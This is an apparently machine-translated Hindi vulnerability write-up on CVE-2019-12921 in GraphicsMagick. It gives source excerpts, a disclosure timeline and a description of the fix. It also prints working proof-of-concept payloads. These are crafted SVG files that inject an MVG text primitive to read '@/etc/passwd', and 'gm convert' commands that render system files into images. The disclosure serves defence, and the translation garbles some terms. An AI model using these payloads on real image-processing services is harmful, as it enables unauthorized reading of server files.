👐🏾 🍬 👩🏼‍🤝‍👨🏿 त्रासदी अकेले नहीं आती है 🧐 🤟🏿 🏘️

2016 में, ImageMagick में ImageTragick भेद्यता ने बहुत शोर मचाया। जोखिम को कम करने के तरीके के रूप में, यह एक अधिक स्थिर और उत्पादक एपीआई के उद्देश्य से, ImageMagick पुस्तकालय के एक कांटा, ग्राफिक्समैगिक का उपयोग करने का प्रस्ताव था। मूल भेद्यता CVE-2016-3717, जिसे स्टीवी द्वारा खोजा गया था, ने एक हमलावर को विशेष रूप से तैयार की गई छवि का उपयोग करके फ़ाइल सिस्टम पर एक मनमाना फ़ाइल पढ़ने की अनुमति दी। आज मैं GraphicsMagick में एक समान भेद्यता पर विचार करूंगा, जिसे मैंने पुस्तकालय के स्रोत कोड का विश्लेषण करते समय खोजा था।

ImageTragick साइट से छद्म प्रोटोकॉल 'लेबल' के माध्यम से मूल शोषण काम नहीं करेगा ।

push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'label:@/etc/passwd' pop graphic-context

कारण यह है कि रेंडर। ReadImage फ़ाइल का ImagePrimitive इमेज प्रोसेसिंग एल्गोरिदम लेबल स्ट्रिंग को संसाधित नहीं कर सकता है: @ / etc / passwd एक छवि के रूप में और फ़ाइल त्रुटि को खोलने में असमर्थ है। समारोह कोड:

 #define VALID_PREFIX(str,url) (LocaleNCompare(str,url,sizeof(str)-1) == 0) if (!VALID_PREFIX("http://", primitive_info->text) && !VALID_PREFIX("https://", primitive_info->text) && !VALID_PREFIX("ftp://", primitive_info->text) && !(IsAccessibleNoLogging(primitive_info->text)) ) { ThrowException(&image->exception,FileOpenError,UnableToOpenFile,primitive_info->text); status=MagickFail; }

फिर भी, फ़ाइल सिस्टम पर किसी भी छवि को पढ़ने की क्षमता बनी हुई है, लेकिन इसका उपयोग केवल आंतरिक जानकारी एकत्र करने के लिए किया जा सकता है। इस "सुविधा" के संचालन का एक उदाहरण BugBounty कार्यक्रमों की रिपोर्टों में पाया जा सकता है, उदाहरण के लिए।
इसने मुझे ग्राफिक्समैगिक में लेबल कोडेक के कार्यान्वयन के बारे में विस्तार से अध्ययन करने के लिए प्रेरित किया। ऐसा करने के लिए, हम रूपांतरण करते हैं:

 $ gm convert label:@etc/passwd output.png

लायब्रेरी / etc / passwd फ़ाइल की पहली पंक्ति लौटाती है, जिसका अर्थ है कि छद्म प्रोटोकॉल असुरक्षित रहता है, लेकिन ज्यादातर मामलों में हमलावर के लिए उपयुक्त नहीं है, क्योंकि कमांड लाइन को प्रभावित करने की कोई संभावना नहीं है। यह समझने के लिए कि आप इस "सुविधा" का कैसे फायदा उठा सकते हैं, आइए इसके कारणों को देखें। लेबल छद्म-प्रोटोकॉल TranslTextEx फ़ंक्शन का उपयोग करके एक स्ट्रिंग को परिवर्तित करता है:

 text=(char *) formatted_text; /* If text starts with '@' then try to replace it with the content of the file name which follows. */ if ((*text == '@') && IsAccessible(text+1)) { text=(char *) FileToBlob(text+1,&length,&image->exception); if (text == (char *) NULL) return((char *) NULL); }

फ़ंक्शन इनपुट पैरामीटर स्वरूपित_टेक्स्ट को स्वीकार करता है और यदि रेखा विशेष वर्ण '@' से शुरू होती है, तो आगे की लाइन जीएम द्वारा उस फ़ाइल के पूर्ण पथ के रूप में माना जाता है जिसमें से सामग्री को परिवर्तन के लिए पढ़ा जाना चाहिए। आइए अन्य स्थानों पर देखें जहां इस फ़ंक्शन का उपयोग किया जाता है, जिसका उपयोग हमलावर द्वारा किया जा सकता है।

/coders/msl.c आवृत्तियों की बहुलता है, लेकिन जीएम इस भाषा का उपयोग कंज़क्चर कमांड के लिए स्क्रिप्टिंग भाषा के रूप में करता है और इस आलेख में विचार नहीं किया जाएगा। ऑपरेशन संभव है, लेकिन इसके लिए विशिष्ट एप्लिकेशन लॉजिक की आवश्यकता होगी।
/magick/attribute.c छवि विशेषताओं को संभालना। TranslText फ़ंक्शन को टिप्पणी और लेबल विशेषताओं के लिए कहा जाता है जब वे उपयोगकर्ता द्वारा सीधे पारित किए जाते हैं, बजाय छवि में संग्रहीत किए जाने के। डेवलपर ने हमें एक छोटी सी टिप दी:
```
  Translate format requests in attribute text when the blob is not open. This is really gross since it is assumed that the attribute is supplied by the user and the user intends for translation to occur. However, 'comment' and 'label' attributes may also come from an image file and may contain arbitrary text. As a crude-workaround, translations are only performed when the blob is not open. 
```
लेकिन क्या होता है अगर छवि के सेटइमेज एट्रिब्यूट फ़ंक्शन द्वारा प्रसंस्करण को टॉग के बाद प्रदर्शन किया जाता है, बूँद बंद हो जाती है। यह पता चला है कि इस तरह के एक कोडेक है - एसवीजी। ReadSVGImage फ़ंक्शन को कॉल की श्रृंखला निम्नानुसार है:
- XML पार्सर बंद हो जाता है
- CloseBlob (छवि) बूँद बंद करता है
- MVG प्रतिनिधि रूपांतरण करता है
- SetImageAttribute (छवि, "टिप्पणी", svg_info.comment) टिप्पणी और शीर्षक विशेषताएँ छवि पर लिखी जाएंगी।

सफल शोषण के लिए, एक हमलावर को इन विशेषताओं का समर्थन करने के लिए अंतिम प्रारूप की आवश्यकता होती है, उदाहरण के लिए GIF, JPEG।

 <?xml version="1.0" standalone="no"?> <!--@/etc/passwd--> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="137px" height="137px" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink= "http://www.w3.org/1999/xlink"> <image xlink:href="http://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png" x="0" y="0" height="100px" width="100px"/> </svg>

 $ gm convert exploit.svg output.gif $ gm convert exploit.svg output.jpeg

/magick/annotate.c निम्नलिखित एनोटेटइमेज फ़ंक्शन का फायदा उठाने के लिए एक अच्छा विकल्प है, जिसका उपयोग किया जाता है:
- /coders/txt.c Lablel pseudo-प्रोटोकॉल TXT प्रोटोकॉल के समान है: जो विशेष रुचि का नहीं है, क्योंकि इसके संचालन के लिए कमांड लाइन तक पहुंच की आवश्यकता होती है।
- /magick/render.c और यहां हम टेक्स्ट मैजिक वेक्टर ग्राफिक्स आदिम के लिए हमारे अंतिम शोषण पर आते हैं, जिसमें एक सरल वाक्यविन्यास है:

 text "text"

यदि विशेष वर्ण '@' से शुरू होता है तो सफल संचालन संभव है।

 $ gm convert -size 800x900 xc:white -draw 'text 20,30 "@/etc/hosts"' foo.png

यह तरीका एक वास्तविक अनुप्रयोग में अत्यंत दुर्लभ है, लेकिन प्रतिनिधियों का उपयोग करके इस भेद्यता का फायदा उठाने का एक तरीका है। प्रतिनिधि एक बाहरी छवि प्रोसेसर है जिसका प्रारूप पुस्तकालय द्वारा समर्थित नहीं है। कई कोडेक्स हैं जो एक अस्थायी फ़ाइल में परिवर्तित होते हैं और आगे की प्रक्रिया MVG छद्म प्रोटोकॉल द्वारा की जाती है। जैसा कि पहले उल्लेख किया गया है, यह कोडेक SVG है।

ऑपरेशन CVE-2019-12921

XML पार्सर SVG छवि मार्कअप को एक मध्यवर्ती फ़ाइल में परिवर्तित करती है:

 FormatString(clone_info->filename,”mvg:%.1024s",filename);

Img टैग रूपांतरण में निम्न कोड है:

  case 'i': { if (LocaleCompare((char *) name,"image") == 0) { MVGPrintf(svg_info->file,"image Copy %g,%g %g,%g '%s'\n", svg_info->bounds.x,svg_info->bounds.y,svg_info->bounds.width, svg_info->bounds.height,svg_info->url); MVGPrintf(svg_info->file,"pop graphic-context\n"); break; } break; }

शोषण के लिए, हमें सामान्य उद्धरण चिह्न के साथ स्ट्रिंग के संदर्भ को तोड़ने और हमारे शोषण को जोड़ने की आवश्यकता है:

 <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="720px" height="720px" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink= "http://www.w3.org/1999/xlink"> <image xlink:href="/etc/favicon.png' text 0,0 '@/etc/passwd" x="0" y="0" height="720px" width="720px"/> </svg>

 $ gm convert exploit.svg output.png

अंतिम छवि

MVG प्रतिनिधि का उपयोग करने वाले अन्य कोडेक्स के लिए ऑपरेशन पाठक के विवेक पर होगा।

सुरक्षा

जीएम का एक अद्यतन संस्करण निर्माता की वेबसाइट पर उपलब्ध है। फिक्स पल में विशेष @ प्रतीक के साथ फ़ाइल समर्थन को हटाता है, मर्क्यूरियल परिवर्तन 16037: f780c290b4ab और 16038: TranslateTextEx फ़ंक्शन के लिए 44e3d0e872eb। डेवलपर्स के अनुसार, भविष्य में, यह तर्क अधिक सुरक्षित कार्यान्वयन में वापस आ जाएगा। वर्कअराउंड के रूप में, पर्यावरण चर MAGICK_CODER_STABILITY = PRIMARY का उपयोग करने की सलाह देता है

समय

भेद्यता के बारे में जानकारी 6 जून, 2019 को डेवलपर को हस्तांतरित कर दी गई, उसी दिन बाद में एक हॉटफिक्स जारी किया गया। 15 जून, 2019 को www.openwall.com पर एक सूचना पत्र प्रकाशित किया गया था। 20 जून, 2019 को CVE-2019-12921 को इस समस्या को सौंपा गया था।

त्रासदी अकेले नहीं आती है

ऑपरेशन CVE-2019-12921

सुरक्षा

समय

More articles: